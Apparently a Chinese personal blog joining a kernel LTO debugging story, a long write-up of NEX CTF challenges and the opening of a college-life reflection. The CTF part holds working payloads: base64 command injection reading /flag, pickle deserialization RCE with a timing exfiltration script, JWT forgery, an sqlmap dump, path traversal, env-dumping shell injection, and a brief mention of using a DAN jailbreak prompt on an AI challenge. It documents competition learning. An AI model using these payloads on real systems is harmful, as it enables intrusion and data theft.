🗃️ 版本选择

我使用米板 5 已经一年有余，发行版从 Arch Linux ARM 换成了对 ARM64 支持更好的 AOSC OS，内核版本也从 6.1.10 用到 6.12.0，再到 6.14.0。

6.14 之后，社区开发者又发布了手写笔充电补丁、手写笔 120Hz 触控采样率补丁等，而我都没有吃上。于是我准备折腾一个更新一些的内核，合一些新的补丁进去。

眼下 7.0 内核临近发布，而高通平台在 6.2 内核就曾经出现过「睡不着」的问题，我担心在这个板子上未经测试的新内核会出现更多回归问题影响使用，就选择了社区已经测试成熟的 6.16.x 内核。

🤨 初见端倪

我下载了社区打好 BSP 补丁集的 6.16.0 内核源码之后，拉取并 rebase 到了该分支最新的 6.16.12 版本，打上了 BORE 调度器补丁、AOSC OS 补丁集，打上了几个群里的零散补丁，就准备着手开始编译。

我使用的是 LLVM Clang 交叉工具链。开始编译前，必然要通过 nconfig 调节一些选项，以调节 defconfig 中不适合我使用场景的选项。我之前在主力机上一直在用 CachyOS 的优化内核，该内核开启了 ThinLTO 优化。我虽然不懂 LTO 具体做了什么，但印象里它会有性能提升的效果，还是在菜单里开启了。

该选项旁边有一个大大的 EXPERIMENTAL，但我想着，「这功能都出了好几年了，应该不会出什么问题吧」，就没想太多。

💥 爆炸与慌乱

十五分钟后过后，热乎的内核新鲜出炉了。

我把内核做成 boot.img 刷到板子上之后，并没有成功点亮 —— 启动半路 panic 挂掉了。

新内核带有高清字体支持，板子是高 DPI 屏幕所以默认开启了，根本看不清几行日志，只能看见 stack trace 的最后几行，以及「30 秒后重启」的提示。

本以为是合并补丁的时候，不小心搞进去了某个和高通平台不兼容的补丁，但直觉告诉我，以我现在的能力，再加上 2026 年 AI 的帮助，足以调试并修好这个问题。

在 AI 的指导下，我通过设置 bootargs 开启了更小的 VGA8x16 字体，重启之后，看见了惨烈的死状 —— CPU: 6 UID: 0 PID: 801 Comm: tailscaled 导致了崩溃，PC（程序计数器）停在 rt6_multipath_hash+0x2f8/0x7d8。

这时，我回想到，BSP sm8150.config 里并没有开启太多网络功能，为了顺利使用 Docker 等涉及到网桥 / TUN 的工具，我开启了很多网络相关的模块。
本来决定关掉这些设置，重新编译再试，AI 却一直叫我使用调试工具看 rt6_multipath_hash 的源码 / 反汇编 …

🧐 深入崩溃

开始 Vibe debugging。
一边登上服务器，恢复原本的 defconfig 重新编译内核，一边学习使用调试工具。

一开始我使用 gdb 未果，并没有看到任何源码，按照 AI 的建议使用 addr2line 也什么都没有看到。
之后我才反应过来：内核是交叉编译的（并不是 x86_64 而是 arm64），而且使用的是 LLVM 而非 GNU 工具链，用 gdb / binutils 能看到东西就有鬼了。

使用 LLVM 的工具追踪到崩溃的行，是一个 READ_ONCE，而反编译出的对应汇编指令是 ldar。

1
2

u32 seed = READ_ONCE(net->ipv4.sysctl.multipath_hash_seed);
2f8: 08 fd df c8 ldar x8, [x8]

我没有学过 ARM64 体系结构，于是把死状截图和这条指令发给了 AI …

🤓👆

AI 一下子就定位到了问题所在，是一条指令没对齐。
哦，这下看懂了，是 ... .load(Ordering::Acquire)（？），而它一次只能读取 8 字节对齐的地址。

绝对是编译器干的。

🔍 修复方案

回想起之前开了 LTO 这个不稳定的特性，看来需要关掉它了。
改配置，编译，刷写。果然，成功点亮。

但我还是不死心 —— 明明在主力的 x64 电脑上用 LTO 内核用得好好的，怎么在 arm 板子上 LTO 内核就起不来了呢？

以 rt6 multipath seed READ_ONCE ldar 作为关键词在网上搜索，我搜到了这条补丁 —— https://patchew.org/linux/20260302060247.7066-1-yuuchihsu@gmail.com/ 。
按照邮件里的说明，这个 fib_multipath_hash_seed 结构体是 4 字节对齐的，而 READ_ONCE 在 LTO 激进的优化下有可能导致指令重排序错误，于是被编译成了要求 8 字节对齐的 ldar。

打上补丁，打开 LTO，编译，刷写，再次成功点亮。

觉得这次折腾的经历很有趣，正巧最近在学习操作系统相关的知识，于是写下这篇博客记录一下。
操作系统是一个复杂严密的学科，且涉及到体系结构、编译器等相关的底层知识，看来我还是要继续好好学，继续「补依赖」呀，不然也不至于连这种问题都要去问 AI 了。

一、神秘黑客的挑衅 - 变形的钥匙

题目内容

浏览源码

首先，下载题目附件并简要浏览源码。可以注意到，题目源码中的关键逻辑函数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

def run_ping(ip_base64):
    try:
        decoded_ip = base64.b64decode(ip_base64).decode('utf-8')
        if not re.match(r'^\d+\.\d+\.\d+\.\d+$', decoded_ip):
            return False
        if decoded_ip.count('.') != 3:
            return False
        
        if not all(0 <= int(part) < 256 for part in decoded_ip.split('.')):
            return False
        if not ipaddress.ip_address(decoded_ip):
            return False
        if len(decoded_ip) > 15:
            return False
        if not re.match(r'^[A-Za-z0-9+/=]+$', ip_base64):
            return False
    except Exception as e:
        return False
    command = f"""echo "ping -c 1 $(echo '{ip_base64}' | base64 -d)" | sh"""

    # ... 运行命令并返回输出

后端程序接收前端传入的，Base64 编码的 IP ip_base64，使用 Python 的 b64decode 进行解码并进行一连串的验证，确保它是合法的 IP 地址，之后，再拼接命令，把原本的 ip_base64 传给 base64 -d 解码并作为 ping 的参数运行。看似万无一失，但作为 CTF 题目，总是会有绕过的办法。

题目中有提到一种「标准化格式」，表现与预期不一致，那看来问题就出在 Base64 上了。

Base64 编解码方式分析

上网搜索 base64 编码方式，找到 这篇博文，下面是核心节选：

通过编码方式可以得知，Base64 解码时，也是四个字符一组进行的。要实现的话，写一个循环然后不断查表就行了。

那么，该何时终止这个循环呢？这里就有两种实现方式：

• 字符串结束时，直接终止循环。
• 遇到等于号 = 或字符串结束时，终止循环。因为等于号后面一定没有其它有效字符，可以省出处理一两个字符的时间。

尝试与实践

思考到这两种终止方式的不同后，我们尝试构造这样一个字符串：

Y3V0ZQ==Y2F0

即，把 cute 的编码 Y3V0ZQ== 和 cat 的编码 Y2F0 拼了起来。

首先尝试用 Python 解码：

1
2

import base64
print(base64.b64decode("Y3V0ZQ==Y2F0".encode()).decode())

结果为 cute。看来，Python 在解码 Base64 时，采用我们想到的第二种终止方式。遇到等于号时，会直接终止解码。

再尝试用 base64 命令解码：

1

printf "Y3V0ZQ==Y2F0" | base64 -d

结果为 cutecat。base64 命令会无视等于号，解码完整个字符串。

那么再结合前两问，解题的方法就了然于心了。题目在 Python 层面做的一堆检查只对字符串前半截有效，而后半截会被传递给 shell。

1
2
3
4
5
6
7
8
9
10

echo $(printf '8.8.8.8'|base64)$(printf ';cat /flag'|base64)
OC44LjguOA==O2NhdCAvZmxhZw==

# base64 命令
printf 'OC44LjguOA==O2NhdCAvZmxhZw==' | base64 -d
8.8.8.8;cat /flag

# Python
>>> base64.b64decode(b'OC44LjguOA==O2NhdCAvZmxhZw==')
b'8.8.8.8'

使用 F12 编辑并重发，填入构造好的字符串，即可拿到 flag 内容。

二、逆流：数据迷踪 - 终极对决：静默任务执行

结合前两问，得知此题目考点为 Python pickle 模块的 RCE。看到无回显，第一反应是本地开个 Web 服务器，在题目靶机上把 Flag 发回来。

然而，题目标签里写着「不出网」。那么，我们还能拿到什么信息呢？这里来分享下我的思路。

既然「空间」维度被一刀切断，我们不妨切换一个维度，从「时间」上获取信息。既然我们在第二问已经拿到了任意代码执行权限，不妨直接使用 sleep 让请求睡一定的秒数来传递信息，就像发电报是通过按键时间的长短进行编码那样。

下面是解题代码，用时间传递 ASCII 编码。AI 辅助加入了错误处理机制，挂半个小时就能拿到 flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120

import pickle
import requests
from io import BytesIO
import time
import math
import os

upload_api = 'http://sd11d3824zr1dbfz.neu-nex.fun/upload'

class NexNet:
    def __init__(self, index):
        self.index = index
    
    def __reduce__(self):
        return (exec, (f'import time; flag=open("/flag").read(); time.sleep((ord(flag[{self.index}])-32)*0.5)',))

class NoSleepNet:
    def __reduce__(self):
        return (exec, ('pass',))

def measure_network_delay():
    """测量网络延迟"""
    obj = NoSleepNet()
    start_time = time.perf_counter()
    response = requests.post(upload_api, files={
        'mission_file': (f'delay_test_{i}.pkl', BytesIO(pickle.dumps(obj)), 'application/octet-stream')
    })
    end_time = time.perf_counter()
    return end_time - start_time
    if i < samples - 1:
        time.sleep(0.2)

def get_flag_char(index, network_delay):
    """获取指定位置的flag字符，减去网络延迟"""
    obj = NexNet(index)
    
    start_time = time.perf_counter()
    response = requests.post(upload_api, files={
        'mission_file': (f'{index}.pkl', BytesIO(pickle.dumps(obj)), 'application/octet-stream')
    })
    end_time = time.perf_counter()
    
    elapsed = end_time - start_time - network_delay
    # 计算字符：sleep时间 = (ASCII码 - 32) * 0.5秒
    # 所以 ASCII码 = (sleep时间 / 0.5) + 32 = (sleep时间 * 2) + 32
    char_code = round(elapsed * 2) + 32
    return chr(char_code)

def load_existing_flag():
    """从flag.txt加载已有的flag，支持断点续传"""
    if os.path.exists('flag.txt'):
        with open('flag.txt', 'r') as f:
            flag = f.read().strip()
        print(f"从flag.txt加载已有flag: {flag}")
        return flag
    else:
        return ""

def update_flag_file(flag):
    """更新flag.txt文件"""
    with open('flag.txt', 'w') as f:
        f.write(flag)
    print(f"已更新flag.txt: {flag}")

def validate_char(char):
    """验证字符是否合理"""
    if 32 <= ord(char) <= 126:
        return True
    return False

def main():
    flag = load_existing_flag()
    print("开始读取flag...")
    
    index = len(flag)
    consecutive_errors = 0
    max_consecutive_errors = 3
    
    while True:
        try:
            current_delay = measure_network_delay()
            char = get_flag_char(index, current_delay)
            
            if validate_char(char):
                print(f"位置 {index} 的字符: '{char}' (ASCII: {ord(char)})")
                flag += char
                update_flag_file(flag)
                consecutive_errors = 0
                
                if char == '}':
                    print("检测到flag结束符 '}'，读取完成！")
                    break
                    
                index += 1
            else:
                print(f"位置 {index} 读取到无效字符: ASCII {ord(char)}")
                consecutive_errors += 1
                
            time.sleep(0.5)
            
            if consecutive_errors >= max_consecutive_errors:
                print("连续错误过多，停止读取")
                break
                
        except Exception as e:
            print(f"读取位置 {index} 时出错: {e}")
            consecutive_errors += 1
            
            if consecutive_errors >= max_consecutive_errors:
                print("连续错误过多，停止读取")
                break
                
            index += 1
            continue
    
    print(f"\n最终flag: {flag}")
    print(f"flag长度: {len(flag)}")

if __name__ == "__main__":
    main()

所以，当一个维度受阻时，不妨更换思路，从另外的角度思考，没准就能得到解决办法。

零、样题

✅【简单】Misc测试题

HEX 编码后的 flag 就在文档中，只是字体颜色改成了白色。全选，复制，解码，拿到答案。

✅【中等】機械の声

DAN 提示词。

✅ 挑战小仓鼠！&【困难】RRROTA机器人

Hackergame 2023 原题。我没有显卡，用 CPU 嗯跑了五个小时拿到提示词。

什，怎么还有希罗酱的事

✅ Quantum compute

跟 AI 话聊了半天，得知量子计算题目可以用线性代数的矩阵乘法思想理解。最后参考那个有点人类不可读的文档，找到对应的逻辑门，完成了实验电路。

✅【用于测试Android环境】枫林鹿

用 JADX 反编译 classes.dex，发现 generateFakeFlag 方法和 decryptFlag 方法。

让 AI 写了个 Frida 脚本（需要科学上网）偷梁换柱，在控制台输出拿到 flag。

❌【中等】火柴人大作战

没看到题。电子竞技不需要视力。

✅【简单】Vigenère

维吉尼亚加密，已知 flag 前三位是 nex，爆破得出密码前三位 hap，再根据题面推测出密码是 happy。

☑️【简单】幻之衣

把附件拖进法国老女人里按了下 F5，直接得到解密函数的完整源码。感谢出题人现场给我拷的工具（？）

✅【简单】抓住小猫咪

F12 里看到游戏用 /get_time 接口获取了所需的时间，编辑并重发 /check 请求把时间改对即可。

其实这道题靠反应力也能做出来。

✅【中等】最终之战

就嗯凑。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

max(range(1)) # 数字-1
len(set(str(range(int())))) # 10
len(set(str(int))) # 11
len(set(str(range))) # 12
len(str(int)) # 13
len(set(str(len))) # 14
len(str(range)) # 15
len(set(str(hex))) # 16
max(range(len(str(ord)))) # 22
len(str(ord)) # 23
len(str(open)) # 24
len(str(print)) # 25
ord(min(str(int))) # 32
ord(min(hex(int()))) # 48
max(range(ord(max(bin(int()))))) # 97
ord(max(bin(int()))) #98

F 70  chr(max(range(len(str(ord))))+ord(min(hex(int()))))
l 108 chr(ord(max(bin(int())))+len(set(str(range(int())))))
a 97  chr(max(range(ord(max(bin(int()))))))
g 103 chr(ord(max(bin(int())))+len(bin(len(bin(int()))))+len(chr(int())))
. 46  chr(len(str(len))+len(str(len)))
t 116 max(str(int))
x 120 max(hex(int()))

# payload：
next(open(
chr(max(range(len(str(ord))))+
ord(min(hex(int()))))+
chr(ord(max(bin(int())))+
len(set(str(range(int())))))+
chr(max(range(ord(max(bin(int()))))))+
chr(ord(max(bin(int())))+
len(bin(len(bin(int()))))+
len(chr(int())))+
chr(len(str(len))+
len(str(len)))+
max(str(int))+
max(hex(int()))+
max(str(int))))

✅【中等】PeekFlag

暴力出奇迹。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

import subprocess as sp

chars = "1234567890{}-_=+qwertyuiopasdfghjklzxcvbnm!@#$%^&*()[]\\|~QWERTYUIOPASDFGHJKLZXCVBNM"
flag = list("?" * 32)

def try_once() -> int:
    result = sp.run(
        ["./peek.vmp.exe"],
        input="".join(flag),
        capture_output=True,
        text=True,
    )
    try:
        chars_correct = int(result.stdout.split()[-3])
    except Exception:
        print("found flag", "".join(flag))
        exit(0)
    return chars_correct

chars_correct = try_once()
idx = 0  # flag中的第n位
chars_idx = 0  # 尝试chars中的第n个字符

while chars_correct < 32:
    chars_idx = 0
    while chars_idx < len(chars):
        flag[idx] = chars[chars_idx]
        new_chars_correct = try_once()
        chars_idx += 1
        if new_chars_correct > chars_correct:
            chars_correct = new_chars_correct
            idx += 1
            print("".join(flag))
            break

print("".join(flag))

一、Misc / 取证

❌【重要】问卷 · 致所有参赛者

交太晚了，痛失三百分。

✅【简单】签到题

exiftool。

✅【简单】兽言兽语

搜索“兽音译者”解码附件中的密文，得到一个百度网盘链接。

下载加密的分卷压缩包和解密工具，解压得到一张 jpg。file 命令发现实则为 png，并且 IEND 块后面包含 zip 文件头。解压拿到 flag。

❌【简单】闪烁的实验室灯光

网不好没下完 kicad。没做。

✅【中等】奇思妙想聪明的小羊

图片后包含 zip 文件头，解压后得到一个 git 仓库。git checkout 355d7cf 拿到 flag。

✅【中等】来自中世纪的宝藏

解压附件后在 docProps 文件夹拿到 Medieval_nex.jpg。

在文档中发现白字密码 钥匙是NEEE_x，用 steghide 解码得到一个乱码文件名的文档。

mv $'\300'$'\356'$'\311'$'\361'$'\265'ı$'\246'$'\262'$'\330'.txt flag.txt

base64 解码得到 ark{LbH_sBhAQ_1v_FUra_ZRQvRINy_Ger4fHeR}，凯撒密码偏移量 -13 解码得到 flag。

✅ ctf怎么能少得了图寻呢

✅【简单】又见猎户座

StarLocator。

✅【简单】经典飞机照

在宁波周围对着高德卫星地图寻找图片中标志性的圈儿和发光的大桥，找到东海大桥和结果“滴水湖”。

✅ 数独

✅【简单】数独一

随便上网找个数独求解器得出答案。

✅【中等】数独二

不会写回溯算法，让 AI 写了个解题脚本（见链接）。DeepSeek 第一次立功。

✅ 重返东大1980

第一页左下角看见灰色 part1: nex{

第二页拉开自行车照片拿到 part2: fllistired_

第三页左上角批注 part3: flllikeLOL_

第四页备注 part4: flllookshenyang_

第五页母版 part5: fllcome_

声音: flag6: fllback}

第一个 flag 拼凑完毕。

第二个 flag 在 ppt 第四页，有一串神秘数字 663399 3243332 2288 442666 999666664 62

打开手机拨号盘，按照对应位置填入字母得到 flag 2: nex{dageda_bu_hao_yong_ma}

✅【简单】Pyyyyyyyyyyyyyyyyyyyython

第二道签到题，直接运行附件即可。

二、Crypto / 密码学

我完全不懂密码学，也没学过《信息安全数学基础》，这部分的题目全是靠 AI 做出来的。

✅【中等】Homo

把「提供一种用python实现的运算，这个运算要求在2**128内高精度可逆，并且三个大质数运算结果的乘积要等于这三个大质数的乘积的运算结果。 」拿去问 AI，得到关键词「模幂运算 / 乘法同态运算（Homomorphic）」。

继续询问得知，正向运算为 operated_result = pow(x, e, n)，逆运算为 original_x = pow(y, d, n)。

让 AI 编写了脚本（需要科学上网）生成 n 和 d 参数，e 直接用 65537，成功拿到 flag。

✅ 保护超级地球

这是 AI 编写的解题脚本，其中使用了做签到题时装的 gmpy2。

✅【中等】Enigma

根据 AI 的讲解得知，Enigma 加密是「对称」的，在转子的状态相同时，用密文再次操作即可得到明文。用 AI 编写的解题脚本（需要科学上网）拿到 flag。

❌【困难】小学数学题

根据网上找到的一篇博文（需要科学上网）得知该题目为「丢番图方程」，需要用椭圆曲线解决。

AI 一开始想着暴力，显然不可能。我提供了博文中的情报，让 AI 编写了 SageMath 解题脚本，但它只吃一个核，跑了一个半小时都没跑出来，遂放弃。

三、AI / 人工智能

做这部分时已经没什么时间了，只做了一道题。

✅【❤】我操，用户彻底怒了！

四、Pwn / 二进制

感觉这个赛道就没有简单题（暴论）

五、Reverse / 逆向

✅【简单】办公达人

解压 xlsx，发现两个 veryhidden 隐藏的工作表 Data 和 Secret，取消它们的 veryhidden 属性再压缩回去，根据表上面的公式，编写脚本得出 flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

result = [1429, 979, 1433, 1384, 1497, 1436, 1137, 1247, 1294, 1069, 1359, 1424, 1349, 1294, 940, 1621, 1072, 1972, 1379, 1299, 1199, 1840, 811, 1179, 1070, 1822, 1245, 1129, 1308, 857, 1147, 1352]
data = [-1, 240, 39, 186, 202, 239, 116, 60, 77, 148, 60, 251, 15, 144, 194, 59, 23, 95, 224, 127, 171, 192, 170, 160, 19, 104, 78, 29, 160, 247, 62, 178, 237, 43, 146, 44, 101, 84, 167, 123, 5, 8, 13, 9, 99, 23, 160, 74, 240, 193, 244, 148, 122, 39, 247, 50, 245, 0, 209, 179, 122, 141, 15, 136, 144, 207, 1, 207, 171, 247, 96, 105, 242, 30, 52, 82, 69, 54, 245, 50, 127, 65, 241, 47, 248, 192, 237, 6, 78, 111, 15, 90, 102, 47, 252, 75, 173, 68, 61, 75, 164, 192, 231, 45, 155, 63, 123, 127, 188, 213, 11, 26, 76, 69, 158, 247, 46, 116, 214, 69, 169, 29, 208, 184, 106, 197, 76, 35, 205, 242, 14, 73, 88, 152, 131, 240, 136, 212, 168, 56, 209, 220, 40, 43, 224, 54, 196, 149, 35, 41, 248, 22, 139, 114, 220, 117, 145, 55, 72, 55, 119, 65, 59, 113, 208, 101, 126, 218, 66, 67, 132, 36, 139, 51, 149, 141, 194, 125, 43, 177, 223, 200, 157, 162, 126, 214, 250, 58, 224, 110, 56, 176, 51, 153, 142, 106, 19, 16, 30, 18, 80, 246, 215, 236, 242, 195, 154, 103, 122, 128, 155, 241, 107, 58, 11, 16, 9, 177, 244, 175, 97, 80, 100, 181, 137, 98, 205, 221, 41, 130, 172, 193, 58, 83, 105, 55, 14, 114, 126, 225, 145, 169, 220, 0, 206, 102, 138, 137, 181, 107, 144, 123, 27, 198, 19, 111, 2, 4, 193, 113, 27, 162, 111, 14, 137, 196, 1, 174, 232, 41, 139, 36, 142, 95, 181, 132, 16, 51, 100, 53, 8, 108, 151, 71, 22, 185, 142, 6, 37, 231, 50, 207, 240, 87, 177, 34, 196, 176, 105, 249, 135, 209, 7, 88, 249, 9, 240, 38, 58, 139, 223, 59, 140, 28, 208, 186, 91, 15, 30, 161, 122]
o = ""

for i in range(32):
    o += chr(
        result[i]
        - (
            data[1 + i]
            + data[33 + i]
            + data[65 + i]
            + data[97 + i]
            + data[129 + i]
            + data[161 + i]
            + data[193 + i]
            + data[225 + i]
            + data[257 + i]
            + data[289 + i]
        )
    )


print(o)

另外，手机自带的 Excel 预览程序能直接看到 veryhidden 的工作表，算是一个非预期解。

✅【简单】ObfuMaze

这道题使用 jsfuck 混淆。上网找了一个解混淆工具，发现迷宫就存在 MAZE 常量中，操作一下就可以得到 flag。

本题难点应该在需要 Node.js 环境？很多小登没有环境就放弃了。

六、Web / 网站与应用程序

✅【简单】签到

第一个 flag 碎片在隐藏的 <input> 里，之后跟着提示一步步走就能拿到完整 flag。

✅【简单】puzzle

这道题应该已经不算简单了（

F12 找到题目主逻辑 puzzle.js，经过了极其高强度的混淆。

发现一个 checkIfFinish 函数看着像是判断是否打完的，于是我把整个题目下载到本地，把该函数改成 return true，就这样简单粗暴地成功拿到 flag。

✅【简单】校园福利中心

这道才是真简单。

F12 发现请求头中有 X-Can-View: no，编辑并重发改为 yes 拿到 flag。

✅【简单】简易签名的 VIP 计划

题目本身不算「简单」，但加上提示确实零基础的人用 AI 也能做了。怀疑是凑简单题数量（

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

import requests
import base64
import json
import time

def base64uri_encode(i):
    data = base64.b64encode(i.encode()).decode()
    return data.replace("+", "-").replace("/", "_").rstrip("=")

base = "http://ulkdfdhpcjabhewe.neu-nex.fun"

res = requests.post(
    base + "/api/login",
    data='{"username":"admin","password":"123456"}',
    headers={"Content-Type": "application/json"},
)

initial_jwt = res.json()["token"].split(".")

jwt_part1 = initial_jwt[0]
jwt_part2 = initial_jwt[1]

login_info = json.loads(base64.b64decode(jwt_part2.encode()).decode())

print(login_info)

j = (
    '{"username":"admin","to":"admin","amount":-100000000,"iat":'
    + str(login_info["iat"])
    + ',"action":"transfer"}'
)

j_b64 = base64uri_encode(j)
req_part2 = jwt_part1 + "." + j_b64 + ".secret123"
jwt = jwt_part1 + "." + j_b64 + "." + base64uri_encode(req_part2)

res = requests.post(
    base + "/api/transfer",
    data='{"from":"admin","to":"admin","amount":-100000000}',
    headers={"Content-Type": "application/json", "Authorization": "Bearer " + jwt},
)

print(res.json())

✅【中等】NEX文档站

先用 sqlmap 工具花了两个小时「睡」出用户名密码为 admin / admin123：

1
2
3
4

sqlmap -u http://w0eu0io2cqmqgpyh.neu-nex.fun/login
  --data 'username=admin&password=123456'
  --dump --time-sec 1 -D ctf_docs 
  -T users -C username,password

根据提示，题目存在路径穿越漏洞，于是直接拿到 flag。

http://dwdofjrxzusuxq13.neu-nex.fun/book/..%2Fflag.txt（草）

所以我还是不会 SQL 注入…

✅【中等】世界时钟

F12 抓个请求发现程序是通过 POST date 命令来获取当前准确时间的。

先 ls：printf 'bHM='|base64 -d|sh

1
2
3
4
5
6
7

Dockerfile
app.py
docker-compose.yml
hint
requirements.txt
static
templates

之后 cat hint：printf 'Y2F0IGhpbnQ='|base64 -d|sh

1

flag in env

直接 export 拿到 flag。

✅【中等】老虎机

看到有的小登用 AI 做这道题，结果 AI 以为用户在读博结果拒绝输出 … 草。

稍微读了下代码，本以为这道题是要用某种方式攻击 RNG 使其产生四个一样的输出，结果我想复杂了。直接按照 FlagClient.js 里的 API 请求格式发一下 /api/flag/claim 就拿到 flag 了 … 更草了。

✅ BanG Dream！

✅【简单】It’s MyGo!!!

还在 go，还在 go。

第一问看了下源码，禁止的命令中没有 tac，直接使用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

curl -X POST 'http://hcbnlhlw9cp2fgcr.neu-nex.fun/?mygo=ls'
  -d 'mujica=mfy' 2>/dev/null | grep mfy -A 10
          <p>诶，你也喜欢mfy吗，那看来我们是同好了，Dockerfile
docker-compose.yml
go.mod
hint.txt
main.go
templates
</p>

curl -X POST 'http://hcbnlhlw9cp2fgcr.neu-nex.fun/?mygo=tac%20hint.txt'
  -d 'mujica=mfy' 2>nul | grep mfy
<p>诶，你也喜欢mfy吗，那看来我们是同好了，flag在环境变量里</p>

curl -X POST 'http://hcbnlhlw9cp2fgcr.neu-nex.fun/?mygo=export'
  -d 'mujica=mfy' 2>nul | grep mfy -A 10
<p>诶，你也喜欢mfy吗，那看来我们是同好了，export FLAG=&#39;nex{8An9dr3Am_17&#39;&#34;&#39;&#34;&#39;s_mY9Odselvntn}&#39;
export GOPATH=&#39;/home/appuser/go&#39;
export HOME=&#39;/home/appuser&#39;
export HOSTNAME=&#39;dc4cdf58bdb2&#39;
export PATH=&#39;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/home/appuser/go/bin&#39;
export PWD=&#39;/app&#39;
</p>

这个转义字符有点恶心，有一些多余的引号。解出来是 nex{8An9dr3Am_17's_mY9Odselvntn}。

✅【中等】Ave Mujica

我说这是困难题。

题目禁止 mygo 参数里使用空格，于是搜索到这篇回答（需科学上网）：

1
2
3
4
5
6
7
8
9

import requests

base = "http://f9tlu5ipm22y6r2r.neu-nex.fun/"

res = requests.post(
    base + "?mygo=export|tee${IFS}templates/index.html",
    data="mujica=mfy",
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)

题目环境可写，不需要过于复杂的重定向输出。运行脚本然后刷新网页即可。

✅ 神秘黑客的挑衅

✅【简单】公开的秘密

dig TXT rota.neu-nex.fun。

✅【中等】扭曲的镜像

确实是已知问题（

✅【困难】变形的钥匙

Python 的 base64 模块，遇到俩等于号就会直接认为是字符串结束，不再往后解码，而 coreutils 的会。

1
2
3
4
5
6
7
8

echo $(printf '8.8.8.8'|base64)$(printf ';cat /flag'|base64)
OC44LjguOA==O2NhdCAvZmxhZw==

printf 'OC44LjguOA==O2NhdCAvZmxhZw=='|base64 -d
8.8.8.8;cat /flag

>>> base64.b64decode(b'OC44LjguOA==O2NhdCAvZmxhZw==')
b'8.8.8.8'

完美。编辑并重发，把得到的 payload 发进去即可拿到 flag。

✅ 逆流：数据迷踪

✅【简单】第一次接触：咖啡店的暗号

直接 cat contact.pkl。

✅【中等】深入虎穴：配置指令的漏洞

https://rizqimulki.com/python-security-pickle-deserialization-and-remote-code-execution-6561781e1efa

1
2
3
4
5
6
7
8
9
10
11
12

import pickle

class ConfigMaster:
    def __reduce__(self):
        return (exec,(
            "import subprocess as sp;"
            'raise ValueError(sp.check_output(["cat","/flag"],text=True))',
        ))

obj = ConfigMaster()
with open("1.pkl", "wb") as f:
    f.write(pickle.dumps(obj))

✅【困难】终极对决：静默任务执行

没有回显，我直接进行一个觉的睡，补充一下这几天缺失的睡眠。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

import pickle
import requests
from io import BytesIO
import time
import math

upload_api = 'http://sd11d3824zr1dbfz.neu-nex.fun/upload'

class NexNet:
    def __reduce__(self):
        return (exec, (
          'import time; flag=open("/flag").read();'
          'time.sleep(ord(flag[0])-32)',
        ))

obj = NexNet()
pkl = pickle.dumps(obj)

start_time = time.perf_counter()
response = requests.post(upload_api, files={
    'mission_file': ('2.pkl', BytesIO(pickle.dumps(obj)), 'application/octet-stream')
})
end_time = time.perf_counter()

print(math.floor(end_time-start_time))
print(chr(math.floor(end_time-start_time)+32))

写完这个手动拿第一位的脚本，确认确实能拿到第一位 n 之后，vibe 了一个自动化的版本。趴桌子上睡了一觉，醒来就拿到 flag 了。

https://chat.deepseek.com/share/i426gpkt92vbdyx02q

七、Quantum / 量子计算

依旧线性代数，感谢 Gemini 老师的悉心教导。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

补充定义：

(X)：“张量积”，给第一个向量的每一个元素，乘以第二个完整的向量

|00> = |0> (x) |0>
= [1 0]^T (x) [1 0]^T
= [1 0 0 0]^T

同理

|11> = |1> (x) |1>
= [0 1]^T (x) [0 1]^T
= [0 0 0 1]^T



归一化：线代“施密特正交化”里所用过的操作，把向量长度变为1


|00> + |11>
= 归一化（[1 0 0 0]^T + [0 0 0 1]^T）
= 归一化（[1 0 0 1]^T）
= [根号2/2, 0, 0, 根号2/2]


使用量子计算解决这个线代问题
(1)
CNOT (CX) 受控门
1 0 0 0
0 1 0 0
0 0 0 1
0 0 1 0

(2)
H 哈德玛门（用于制叠加态）
H = 根号2/2  [1 1]
            [1 -1]

初始值：
|00> = [1 0 0 0]^T

而H门不能应用于四位向量，需要先对I门（对角矩阵[1 0],[0 1]）做张量积

结果为 根号2/2 乘
1 0 1 0
0 1 0 1
1 0 -1 0
0 1 0 -1

再乘以 |00>
= 根号2/2 [1 0 1 0]^T

再用CNOT门去乘

结果为 根号2/2 [1 0 0 1]^T 即为所求

qc = QuantumCircuit(2)
qc.h(0) # 第1位应用I门，即上面的张量积运算
qc.cnot(0, 1)

AI教的。

说是总结，其实又是篇流水账一样的东西，只是想记录一下一年来的几次「失败」和「成功」的片段，供未来的我回顾。

😶‍🌫️ 走进大学校园的第一天

8 月 28 日，带着满心的期待，我开启了我未来四年的大学生活。从走进大学校园的第一天，就感觉到自己的身上，多了某种沉甸甸的宿命感。

离家的站台，晚霞显得格外明艳

整理东西，安顿好自己之后，入住宿舍的第一晚自然满是不安。躺在宿舍的床上看着夕阳西下，耳机里放着曾经最喜爱的《我多想说再见啊》，我在心里这样和自己说着：从今天起，真的要和曾经的自己说再见了。

😔 幻想与现实的落差

